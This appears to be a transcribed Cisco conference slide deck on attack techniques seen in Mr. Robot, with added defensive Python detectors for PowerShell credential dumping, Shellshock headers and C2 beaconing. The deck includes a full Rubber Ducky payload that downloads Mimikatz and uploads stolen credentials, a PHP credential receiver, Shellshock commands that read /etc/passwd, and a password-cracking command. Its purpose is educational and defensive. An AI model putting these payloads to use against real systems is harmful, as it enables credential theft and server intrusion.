Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker

58 slides, Oct 25, 2017

Slide Content

Vince Kornacki, Senior Security Consultant, Cisco
Sean Mason, Director of Incident Response, Cisco
October 12, 2017
Exploring the Anatomy of a Cyber-Attack
Security Through the Eyes of a Hacker

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Hollywood’s Depiction of Hacking
“I dropped a logic bomb through the trap door.” -Swordfish
“A gigabyte of RAM should do the trick.” -Under Siege 2
“I’ll create a GUI interface using Visual Basic, see if I can track an IP address.” -CSI
“Isolate the node and dump it on the other side of the router.” -NCIS

The award for Hollywood’s best attempt at depicting hacking goes to…

Elliot Hacks Steel Mountain Thermostat

How’d He Do It?
• Social-engineers his way inside the building
• Splices a Raspberry Pi into the BACnet (Building Automation and Control Network) lines connected to the thermostat


Angela Hacks Her Boss’ Evil Corp Credentials

How’d She Do It?
Rubber Ducky USB
• Keystroke injection attack tool (a USB device that enumerates as a keyboard and types a scripted payload)
Invoke-Mimikatz
• PowerShell script that reflectively injects Mimikatz into memory, so no Mimikatz binary touches disk

Proof of Concept
1. Write the Payload (Ducky Script)
• Open an administrator command prompt
REM Wait for the HID device to enumerate, then open the Run dialog
DELAY 1000
GUI r
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
REM Accept the UAC prompt with Alt+Y (only works when the logged-on user is a local admin)
ALT y
DELAY 1000
• Obfuscate the command prompt
REM Shrink the console to a single 18-column line and use light yellow text on a bright white background
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER

Proof of Concept
1. Write the Payload (continued)
• Download and execute the “Invoke-Mimikatz” script, then upload the results
REM MimikatzScriptURL and PHP_Creds_Receiver_URL are placeholders for the attacker-controlled URLs
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('MimikatzScriptURL'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('PHP_Creds_Receiver_URL', $output)"
ENTER
DELAY 15000
• Clear the Run history and exit
REM PathToRunMRU is a placeholder for the registry key that stores the Run dialog history
STRING powershell "Remove-ItemProperty -Path 'PathToRunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER

Proof of Concept
2. Encode the Payload
java -jar duckencode.jar -i invoke-mimikatz.txt -o inject.bin
3. Set up Web Server (the PHP_Creds_Receiver_URL endpoint)
<?php
// Write the POSTed Mimikatz output to a file named after the victim's IP address and the current time
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input"));
?>

Proof of Concept
4. Deploy Attack
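What the same payload looks like from the defender's side, as an added example that is not part of the Cisco deck: a Python triage routine over PowerShell Script Block Logging records (Event ID 4104), which capture the script text even when it is launched from the Run dialog. The record shape, the indicator names and the sample script blocks are this example's own constructions; the first sample reproduces the deck's cradle with its placeholder URLs, and the example also handles a -EncodedCommand variant, which goes beyond the deck's payload.

```python
"""Triage PowerShell Script Block Logging (Event ID 4104) records for the
download-cradle / in-memory Mimikatz / upload pattern used by the Ducky payload.
Added example: event shape, indicator names and sample records are constructed here."""
import base64
import re

# Each indicator is a regex over the (decoded) script block text.
INDICATORS = {
    "download_cradle": re.compile(r"net\.webclient.*?downloadstring", re.I | re.S),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "credential_dump": re.compile(r"invoke-mimikatz|-dumpcreds|sekurlsa", re.I),
    "exfil_upload": re.compile(r"net\.webclient.*?uploadstring", re.I | re.S),
    "anti_forensics": re.compile(r"remove-itemproperty.*?runmru|clear-history", re.I | re.S),
}

# -EncodedCommand / -enc / -ec carries the script as base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded_command(text):
    """Append the decoded -EncodedCommand payload (if any) so the indicators can match it."""
    m = ENCODED_ARG.search(text)
    if not m:
        return text
    try:
        return text + "\n" + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text  # not valid base64/UTF-16LE: leave the raw text for the regexes


def score_script_block(text):
    """Return the sorted list of indicator names that match this script block."""
    visible = expand_encoded_command(text)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(visible))


def triage(events):
    """Return one finding per 4104 record that matches at least one indicator.

    'high'   = credential dumping, or download-and-execute in memory
    'medium' = any other indicator on its own (e.g. only the RunMRU cleanup)"""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        tags = score_script_block(ev["ScriptBlockText"])
        if not tags:
            continue
        high = "credential_dump" in tags or {"download_cradle", "in_memory_exec"} <= set(tags)
        findings.append({"record": ev["RecordId"],
                         "severity": "high" if high else "medium",
                         "tags": tags})
    return findings


# Constructed sample records (not real telemetry). Record 2 is the encoded variant.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/im.ps1')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"EventID": 4104, "RecordId": 1, "ScriptBlockText":
        "IEX (New-Object Net.WebClient).DownloadString('MimikatzScriptURL'); "
        "$output = Invoke-Mimikatz -DumpCreds; "
        "(New-Object Net.WebClient).UploadString('PHP_Creds_Receiver_URL', $output)"},
    {"EventID": 4104, "RecordId": 2, "ScriptBlockText":
        "powershell -nop -w hidden -enc " + _ENCODED},
    {"EventID": 4104, "RecordId": 3, "ScriptBlockText":
        r"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' "
        "-Name '*' -ErrorAction SilentlyContinue"},
    {"EventID": 4104, "RecordId": 4, "ScriptBlockText":
        "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"},  # benign admin one-liner
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Script block logging has to be enabled by policy before any of this exists to read; once it is, the cradle, the in-memory credential dump and the upload in record 1 each match on their own, so a single regex failing does not lose the detection.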

Elliot Hacks the Prison

Spoofing a Bluetooth Connection

How’d He Do It?
1. Enable Bluetooth
2. Scan for Bluetooth devices

3. Spoof the MAC Address of the Keyboard
4. Link Bluetooth Device to the Cop’s Laptop
5. Hack the Prison

Elliot Hacks Tyrell’s Email Account

How’d He Do It?
wget -U "() { test;}; echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" "http://evilcorp-intl.com/login.email.srf?wa=wsignin1.0&rpsnv=4d"
1. Exploit the Shellshock vulnerability using wget: -U sets the User-Agent header, the CGI handler exports it to bash as the environment variable HTTP_USER_AGENT, and an unpatched bash executes the commands that follow the function body
2. Use John the Ripper on /etc/passwd (Elliot should have used /etc/shadow, since that is where modern systems keep the password hashes; /etc/passwd holds only an “x” placeholder)
./john /etc/passwd

Simple Attack That Works
GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: example.com
Edit the “User-Agent” header to “() { :; }; /bin/eject”. A CGI server hands it to bash as the environment variable HTTP_USER_AGENT=() { :; }; /bin/eject; an unpatched bash parses the value as a function definition and keeps executing what follows the closing brace, so /bin/eject runs on the server.
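The mechanism behind that request, as an added example that is not from the deck: a Python model of the CGI header-to-environment mapping (RFC 3875) and a request scanner that reports which header would inject commands and what those commands are. The request samples, function names and the LOCAL_CHECK string are this example's own; it also covers injection through headers other than User-Agent, which the deck does not show.

```python
"""How a forged header reaches bash under CGI, and how to spot it in a raw request.
Added example (not from the deck): the mapping follows RFC 3875; the request
samples and function names are this example's own constructions."""

# The exact 4-byte prefix an unpatched bash (CVE-2014-6271) treated as "this variable
# holds a function"; bash compared these four characters literally.
FUNCTION_PREFIX = "() {"

# The usual local check for a patched shell: a vulnerable bash prints "vulnerable".
LOCAL_CHECK = "env x='() { :;}; echo vulnerable' bash -c 'echo test'"


def cgi_environment(headers):
    """RFC 3875 mapping: 'User-Agent' -> HTTP_USER_AGENT, 'Cookie' -> HTTP_COOKIE, ..."""
    return {"HTTP_" + name.strip().upper().replace("-", "_"): value.strip()
            for name, value in headers}


def trailing_commands(value):
    """Return the command text after the function body, or None when the value is not
    a function definition or carries nothing after its closing brace."""
    if not value.startswith(FUNCTION_PREFIX):
        return None
    depth = 0
    for i, ch in enumerate(value):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                tail = value[i + 1:].strip().lstrip(";").strip()
                return tail or None
    return None  # unbalanced braces: bash rejects the definition


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request line, [(header name, value), ...])."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name, value))
    return lines[0], headers


def scan_request(raw):
    """Return [(environment variable, injected commands)] for every offending header."""
    _, headers = parse_request(raw)
    findings = []
    for var, value in cgi_environment(headers).items():
        cmds = trailing_commands(value)
        if cmds is not None:
            findings.append((var, cmds))
    return findings


# Constructed samples: the deck's benign request, then three Shellshock variants.
_UA = "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36"
BENIGN = (
    "GET / HTTP/1.1\r\n"
    "Accept-Encoding: gzip,deflate,sdch\r\n"
    "Cache-Control: no-cache\r\n"
    + _UA + "\r\n"
    "Host: example.com\r\n\r\n"
)
EJECT = BENIGN.replace(_UA, "User-Agent: () { :; }; /bin/eject")
COOKIE = BENIGN.replace("Host: example.com", "Cookie: () { :;}; /usr/bin/id\r\nHost: example.com")
PASSWD = BENIGN.replace(
    _UA, 'User-Agent: () { test;}; echo "Content-type: text/plain"; echo; echo; /bin/cat /etc/passwd')

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("eject", EJECT), ("cookie", COOKIE), ("passwd", PASSWD)):
        print(name, scan_request(req))
```

The scanner keys on the literal "() {" prefix because that is what bash itself checked; a value such as "() { :; }" with nothing after the brace is a harmless definition and is reported as None, which keeps the check from firing on every curly brace in a header.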

Darlene Phishes Evil Corp

Phishing Website Proof of Concept
1. Start up the Social Engineer Toolkit (SET)
2. Choose attack method
3. Configure attacker’s website and Kali box
4. Create website and start server
5. Victim visits phishing site
6. Victim is owned

Cisco Consultants Use These Tools and Techniques
Application & Penetration Team Services
• External Network Penetration Test: exploit software vulnerabilities such as Shellshock
• Internal Network Penetration Test: use post-exploitation tools like “Mimikatz” and “John the Ripper” to compromise authentication credentials
• IoT Security Assessment: manipulate IoT protocols like BACnet using a Raspberry Pi
• Social Engineering Assessment: launch phishing attacks using tools like the Social Engineer Toolkit (SET)

Penetration Testing Methodology

Cisco Incident Response Goes To Hollywood

Security Advisory Services
• Incident Response
• Security Strategy and Architecture
• Compliance
• Privacy and Risk Management
• Security Assessments and Penetration: Network and Infrastructure; Application and System; Physical
Benefits
• Higher confidence in what is actually happening in your network, including greater visibility and deeper understanding of your operations and infrastructure
• Identify security gaps, ineffective operational processes and poorly designed technology security controls

Cisco Incident Response Services
A Holistic Portfolio for Your Organization’s Needs
• Proactive Threat Hunting: “Am I currently compromised?”
• Emergency Incident Response: “I need help right now.”
• IR Tabletop Exercises: “I need to know we will respond correctly.”
• Incident Response Retainers: “I want to know I have a team standing by.”
• IR Plans & Playbooks: “Am I missing anything needed to respond?”
• IR Readiness Assessments: “I need a plan for when an incident occurs.”
Included in IR Retainers

Threat Intel
• 300+ full-time threat intel researchers
• 1,100+ threat traps
• 1.5 million daily malware samples
• 600 billion daily email messages
• 16 billion daily web requests
• 20 billion threats blocked
Intel sources: honeypots; open source communities; vulnerability discovery (internal); product telemetry; internet-wide scanning; customer data sharing programs; service provider coordination program; open source intel sharing; 3rd-party programs (MAPP); industry sharing partnerships (ISACs)
Intel sharing: 500+ participants; millions of telemetry agents; 4 global data centers; 100+ threat intelligence partners

Top things we are seeing
1. Malware outbreaks
2. Data exfiltration
3. Ransomware
4. Insiders

Nyetya: Helping Customers Respond Quickly
Retainer customers and emergency customers
• Immediate access to named responders
• Urgent notification with unpublished details
• Quick access to incident responders and intelligence
• Emergency bulletin
• IR onsite in Ukraine working with Talos threat researchers
• Source: M.E. Doc (Nyetya was delivered through the compromised update mechanism of the M.E.Doc accounting software)

Kill Chain (KC)
“Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains”, Lockheed Martin, bit.ly/killchain
KC1 - Reconnaissance: collecting information about the target organization
KC2 - Weaponization: packaging the threat for delivery
KC3 - Delivery: transmission of the weaponized payload
KC4 - Exploitation: exploiting vulnerabilities on a system
KC5 - Installation: installing malware on a target
KC6 - Command & Control: providing “hands on the keyboard” access to the target system
KC7 - Actions on Intent (“Actions on Objectives” in the Lockheed Martin paper): the attacker achieves their objective (e.g. stealing information)

Customer Case Study: Telecommunications (revenue $3B+, employees 100k+)
Incident
• Targeted attack by a nation-state actor; escalated to Cisco IR after law enforcement notification
• Organization’s testing/development network environment targeted, which lacked security controls and monitoring
• Attackers maintained persistence in the environment for 5+ months
• C2 malware with zero A/V detection rate, which was utilized for persistence into the environment
Response
• Deployed StealthWatch into existing infrastructure
• Deployed AMP for Endpoints to facilitate endpoint and network analysis and remediation
• Malware reverse engineering, memory forensics and disk forensics performed on affected hosts
• App Pen Testing group conducted application hardening post-incident response
Intelligence
• Umbrella Investigate utilized for monitoring the primary C2 server
Outcomes
• Cisco StealthWatch deployment provided enhanced visibility into infrastructure, which identified additional security gaps
• Cisco provided SMEs to assist in response efforts to identify, contain and eradicate the malware
• Cisco utilized proven hunt methodologies and techniques for an advanced adversary in a large environment, while performing forensic methodologies for root cause analysis
People, Process, Technology

Dynamic Threats
Category | Objective | Example | Skill Potential | Data Targets | Named Actors
State Sponsored/APT | Economic, Political Advantage, Destruction | Intellectual Property Theft, DDOS | Very High | Intellectual Property, Negotiation, National Intelligence | APT1, Energetic Bear
Cyber Crime | Financial Gain | Credit Card Theft | High | Credit Card Data, Personally Identifiable Information, Health Records | Russian Business Network (RBN)
Hacktivism | Defamation, Destruction, Press & Policy | Website Defacements, DDOS | Low - Med | Access to the Network, Compromising Information | Syrian Electronic Army, LizardSquad, Anonymous
Nuisance | Access & Propagation | Botnets & Spam | Low | Sensitive Information, Vulnerable Data | General Malware
Insiders | Revenge, Destruction, Monetary Gain | Destruction, Theft | Med | Intellectual Property, Compromising Information | Jimmy, Suzy, Sally, Johnny

Anatomy of the Attack
(Lab diagram shown on each of the following slides: Internet - Gb Router - ISP Cable Modem - Win10 Hyper-V host)
Reconnaissance
• Collecting information about the organization
• Port scan (e.g. Nmap)
• Network logon from local Administrator account

Weaponization
Typically, we don’t see KC2; however, malware analysis of “C2malware.exe” provided some insight into the payload and its capabilities. Fields recovered from the sample:
00-00-00-AA-AB-AB | 192.168.1.1 | HostName | Administrator | C2Domain.com | AcmeIncResearch

Delivery
• Network logon from Administrator account
  • No password required
• Transmission of C2malware.exe
  • Attacker(s) choice: no firewall, no A/V

Exploitation
• Exploitation? None required: no firewall, no password required

Installation
• Install C2malware.exe on the target machine
01/01/2017 00:00:30 UTC  C:\Users\Attacker\C2malware.exe
01/01/2017 00:02:00 UTC  C:\Windows\system32\C2malware.exe (copied into system32 90 seconds after it landed in the user profile)

Command and Control (C2)
• C:\Windows\system32\C2malware.exe
• Persistence via \Run key
• Beacons out over port 80 to C2 node

Actions on Objectives
• Remote backdoor via C2malware.exe with the following capabilities:
  • Remote shell
  • Read/write/execute file(s)
  • Create tasks
  • List drives
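The C2 stage above is the one a network sensor can see without any endpoint agent: a backdoor that sleeps and beacons produces outbound connections at a near-constant interval, which human browsing never does. As an added example that is not from the deck or the case study, here is a Python periodicity check over flow records. The record format, the addresses and the timings are this example's own constructions; the scoring (coefficient of variation of the inter-connection gaps) is a generic beaconing heuristic, not Cisco's.

```python
"""Flag hosts whose outbound port-80 connections recur at a near-constant interval,
the beaconing behaviour described for C2malware.exe. Added example (not from the
deck): the flow-record format, addresses and timings below are constructed."""
from collections import defaultdict
from statistics import mean, pstdev


def parse_flows(lines):
    """Constructed flow-record format: '<epoch> <src_ip> <dst_ip> <dst_port> <bytes>'."""
    flows = []
    for line in lines:
        ts, src, dst, port, size = line.split()
        flows.append((int(ts), src, dst, int(port), int(size)))
    return flows


def beacon_candidates(flows, port=80, min_connections=6, max_jitter=0.15):
    """Group flows by (src, dst) on the given port and score the regularity of the
    inter-connection gaps by their coefficient of variation (stdev / mean).
    Human browsing is bursty (jitter well above 1); a sleep-loop beacon sits near 0."""
    times = defaultdict(list)
    for ts, src, dst, dport, _ in flows:
        if dport == port:
            times[(src, dst)].append(ts)
    results = []
    for (src, dst), stamps in times.items():
        stamps.sort()
        if len(stamps) < min_connections:
            continue  # too few samples to call anything periodic
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        jitter = pstdev(gaps) / period if period else float("inf")
        results.append({"src": src, "dst": dst, "count": len(stamps),
                        "period_s": round(period, 1), "jitter": round(jitter, 3),
                        "beacon": jitter <= max_jitter})
    return sorted(results, key=lambda r: r["jitter"])


def _make_lines(start, src, dst, port, gaps, size=312):
    """Build constructed records from a start time and a list of gaps in seconds."""
    stamps, t = [start], start
    for g in gaps:
        t += g
        stamps.append(t)
    return [f"{t} {src} {dst} {port} {size}" for t in stamps]


# Constructed sample log: one 60-second beacon with +/- 2 s of sleep jitter, one
# bursty browsing session, and one perfectly regular port-443 health check.
BEACON_GAPS = [60, 61, 59, 60, 62, 58, 60, 61, 59]
BROWSING_GAPS = [5, 120, 3, 400, 17, 60, 900]
SAMPLE_LOG = (
    _make_lines(1483228800, "192.168.1.50", "203.0.113.10", 80, BEACON_GAPS)
    + _make_lines(1483228830, "192.168.1.20", "198.51.100.7", 80, BROWSING_GAPS)
    + _make_lines(1483228900, "192.168.1.20", "198.51.100.9", 443, [30] * 6)
)

if __name__ == "__main__":
    for row in beacon_candidates(parse_flows(SAMPLE_LOG)):
        print(row)
```

Real implants add random sleep jitter and mix in long sleeps to defeat exactly this check, so treat max_jitter as a tuning knob and pair the score with the destination's reputation (the case study used Umbrella Investigate for the C2 domain) rather than alerting on regularity alone; the port-443 sample shows why, since a legitimate health check scores a perfect 0.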

Extortion Defined
The practice of obtaining something, especially money, through force or threats

Attribution was simpler

First forays into e-extortion
• 2007: FBI releases a warning about online extortion mirroring mafia tactics

Lizard Squad Gaming DDoS

DDOS “Protection” Racket

Armada Collective DHS Warning

Copy Cat Profiteering

Data Breach Response Phishing
Scammers leveraged breaches of adult-themed websites to scare victims
into ransom payments

Ransomware
http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/
http://blog.talosintel.com/2016/07/ranscam.html

Doxware
•First started seeing this over a year ago
•Becoming more mainstream
•New frontier of ransomware
•Data Exfiltration
•Encryption of Data
•Extortion
•Data leakage

Resources
Cisco Incident Response Team
If you are currently experiencing an incident, please
contact us at: 1-844-831-7715
Or email [email protected]
Cisco Security
Services: https://cisco.com/go/securityservices
Blogs: https://blogs.cisco.com

“I drink and I hack things” –T. Lannister